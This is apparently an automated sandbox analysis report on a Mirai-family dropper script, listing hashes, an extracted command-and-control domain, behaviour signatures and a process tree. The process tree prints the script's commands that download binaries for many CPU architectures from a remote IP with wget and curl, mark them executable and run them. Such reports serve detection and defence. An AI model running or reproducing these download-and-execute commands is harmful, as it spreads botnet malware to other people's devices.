Analysis
max time kernel: 119s
max time network: 124s
platform: debian-9_mipsel
resource: debian9-mipsel-20240226-en
resource tags: arch:mipsel, image:debian9-mipsel-20240226-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mipsel, system
submitted: 19-12-2024 07:08
Static task: static1
Behavioral task: behavioral1, sample feelme420.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2, sample feelme420.sh, resource debian9-armhf-20240611-en
Behavioral task: behavioral3, sample feelme420.sh, resource debian9-mipsbe-20240418-en
Behavioral task: behavioral4, sample feelme420.sh, resource debian9-mipsel-20240226-en
General
Target: feelme420.sh
Size: 3KB
MD5: 22e9d65b991f00de3a52071664dc52f9
SHA1: 2b6dd972572c4c72ecf43bb7b66eebe776cd0360
SHA256: 7c31b6f7e29de978c261d41059788662d9d53faf08be61330e611eedcd46d33b
SHA512: eefb50d98fc847673e4c38177789e26ee89ec7f027ec5ec92a842470638a84300f378cf10120afab26fe5a87de34c6616f33fc389be816b4763f0fea0eff18cb
Malware Config
Extracted (mirai): chernobyl.stressing.world
Signatures

Mirai family

File and Directory Permissions Modification (1 TTPs, 16 IoCs)
Adversaries may modify file or directory permissions to evade defenses.
pid  Process
772  chmod
809  chmod
848  chmod
869  chmod
881  chmod
725  chmod
733  chmod
739  chmod
815  chmod
863  chmod
875  chmod
753  chmod
893  chmod
791  chmod
829  chmod
887  chmod

Executes dropped EXE (16 IoCs)
ioc             pid  Process
/tmp/f331m3420  726  f331m3420
/tmp/f331m3420  734  f331m3420
/tmp/f331m3420  740  f331m3420
/tmp/f331m3420  755  f331m3420
/tmp/f331m3420  774  f331m3420
/tmp/f331m3420  793  f331m3420
/tmp/f331m3420  810  f331m3420
/tmp/f331m3420  816  f331m3420
/tmp/f331m3420  830  f331m3420
/tmp/f331m3420  849  f331m3420
/tmp/f331m3420  864  f331m3420
/tmp/f331m3420  870  f331m3420
/tmp/f331m3420  876  f331m3420
/tmp/f331m3420  882  f331m3420
/tmp/f331m3420  888  f331m3420
/tmp/f331m3420  894  f331m3420

Reads runtime system information (16 IoCs)
description              ioc                            Process
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl
File opened for reading  /proc/sys/crypto/fips_enabled  curl

System Network Configuration Discovery (1 TTPs, 3 IoCs)
Adversaries may gather information about the network configuration of a system.
pid  Process
728  wget
731  curl
732  cat

Writes file to tmp directory (31 IoCs)
Malware often drops required files in the /tmp directory.
description                   ioc                     Process
File opened for modification  /tmp/feelme420.i586     curl
File opened for modification  /tmp/feelme420.mpsl     wget
File opened for modification  /tmp/feelme420.mpsl     curl
File opened for modification  /tmp/feelme420.arm7     curl
File opened for modification  /tmp/feelme420.sh4      curl
File opened for modification  /tmp/feelme420.spc      curl
File opened for modification  /tmp/feelme420.x86_64   wget
File opened for modification  /tmp/feelme420.i686     curl
File opened for modification  /tmp/feelme420.x86      wget
File opened for modification  /tmp/feelme420.ppc      curl
File opened for modification  /tmp/feelme420.m68k     curl
File opened for modification  /tmp/feelme420.spc      wget
File opened for modification  /tmp/feelme420.arc      wget
File opened for modification  /tmp/feelme420.i686     wget
File opened for modification  /tmp/feelme420.i486     wget
File opened for modification  /tmp/feelme420.mips     curl
File opened for modification  /tmp/feelme420.arm5     wget
File opened for modification  /tmp/feelme420.arm7     wget
File opened for modification  /tmp/feelme420.sh4      wget
File opened for modification  /tmp/feelme420.mips     wget
File opened for modification  /tmp/feelme420.arm6     curl
File opened for modification  /tmp/feelme420.m68k     wget
File opened for modification  /tmp/feelme420.i486     curl
File opened for modification  /tmp/feelme420.x86      curl
File opened for modification  /tmp/feelme420.arm      curl
File opened for modification  /tmp/feelme420.ppc      wget
File opened for modification  /tmp/feelme420.arc      curl
File opened for modification  /tmp/feelme420.arm5     curl
File opened for modification  /tmp/feelme420.x86_64   curl
File opened for modification  /tmp/f331m3420          feelme420.sh
File opened for modification  /tmp/feelme420.arm6     wget
Processes

/tmp/feelme420.sh  /tmp/feelme420.sh
  - Writes file to tmp directory
  PID: 697

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.x86
    - Writes file to tmp directory
    PID: 704

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.x86
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 711

  /bin/cat  cat feelme420.x86
    PID: 723

  /bin/chmod  chmod +x f331m3420 feelme420.sh feelme420.x86 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-OtI5tN
    - File and Directory Permissions Modification
    PID: 725

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 726

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.mips
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 728

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.mips
    - Reads runtime system information
    - System Network Configuration Discovery
    - Writes file to tmp directory
    PID: 731

  /bin/cat  cat feelme420.mips
    - System Network Configuration Discovery
    PID: 732

  /bin/chmod  chmod +x f331m3420 feelme420.mips feelme420.sh feelme420.x86 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-OtI5tN
    - File and Directory Permissions Modification
    PID: 733

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 734

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.mpsl
    - Writes file to tmp directory
    PID: 736

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.mpsl
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 737

  /bin/cat  cat feelme420.mpsl
    PID: 738

  /bin/chmod  chmod +x f331m3420 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86 systemd-private-17bbbb0f29ad499e9de91ce9ceeb7e2b-systemd-timedated.service-OtI5tN
    - File and Directory Permissions Modification
    PID: 739

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 740

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.arm
    PID: 741

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.arm
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 745

  /bin/cat  cat feelme420.arm
    PID: 752

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86
    - File and Directory Permissions Modification
    PID: 753

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 755

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.arm5
    - Writes file to tmp directory
    PID: 757

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.arm5
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 763

  /bin/cat  cat feelme420.arm5
    PID: 771

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86
    - File and Directory Permissions Modification
    PID: 772

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 774

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.arm6
    - Writes file to tmp directory
    PID: 777

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.arm6
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 782

  /bin/cat  cat feelme420.arm6
    PID: 790

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86
    - File and Directory Permissions Modification
    PID: 791

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 793

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.arm7
    - Writes file to tmp directory
    PID: 798

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.arm7
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 807

  /bin/cat  cat feelme420.arm7
    PID: 808

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.sh feelme420.x86
    - File and Directory Permissions Modification
    PID: 809

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 810

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.ppc
    - Writes file to tmp directory
    PID: 812

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.ppc
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 813

  /bin/cat  cat feelme420.ppc
    PID: 814

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86
    - File and Directory Permissions Modification
    PID: 815

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 816

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.m68k
    - Writes file to tmp directory
    PID: 818

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.m68k
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 819

  /bin/cat  cat feelme420.m68k
    PID: 828

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.x86
    - File and Directory Permissions Modification
    PID: 829

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 830

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.sh4
    - Writes file to tmp directory
    PID: 834

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.sh4
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 839

  /bin/cat  cat feelme420.sh4
    PID: 846

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.x86
    - File and Directory Permissions Modification
    PID: 848

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 849

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.spc
    - Writes file to tmp directory
    PID: 852

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.spc
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 857

  /bin/cat  cat feelme420.spc
    PID: 862

  /bin/chmod  chmod +x f331m3420 feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86
    - File and Directory Permissions Modification
    PID: 863

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 864

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.arc
    - Writes file to tmp directory
    PID: 866

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.arc
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 867

  /bin/cat  cat feelme420.arc
    PID: 868

  /bin/chmod  chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86
    - File and Directory Permissions Modification
    PID: 869

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 870

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.x86_64
    - Writes file to tmp directory
    PID: 872

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.x86_64
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 873

  /bin/cat  cat feelme420.x86_64
    PID: 874

  /bin/chmod  chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
    - File and Directory Permissions Modification
    PID: 875

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 876

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.i686
    - Writes file to tmp directory
    PID: 878

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.i686
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 879

  /bin/cat  cat feelme420.i686
    PID: 880

  /bin/chmod  chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
    - File and Directory Permissions Modification
    PID: 881

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 882

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.i486
    - Writes file to tmp directory
    PID: 884

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.i486
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 885

  /bin/cat  cat feelme420.i486
    PID: 886

  /bin/chmod  chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
    - File and Directory Permissions Modification
    PID: 887

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 888

  /usr/bin/wget  wget http://94.23.167.188/F331M3/feelme420.i586
    PID: 890

  /usr/bin/curl  curl -O http://94.23.167.188/F331M3/feelme420.i586
    - Reads runtime system information
    - Writes file to tmp directory
    PID: 891

  /bin/cat  cat feelme420.i586
    PID: 892

  /bin/chmod  chmod +x f331m3420 feelme420.arc feelme420.arm feelme420.arm5 feelme420.arm6 feelme420.arm7 feelme420.i486 feelme420.i586 feelme420.i686 feelme420.m68k feelme420.mips feelme420.mpsl feelme420.ppc feelme420.sh feelme420.sh4 feelme420.spc feelme420.x86 feelme420.x86_64
    - File and Directory Permissions Modification
    PID: 893

  /tmp/f331m3420  ./f331m3420 feelme420.exploit
    - Executes dropped EXE
    PID: 894
MITRE ATT&CK Enterprise v15
Downloads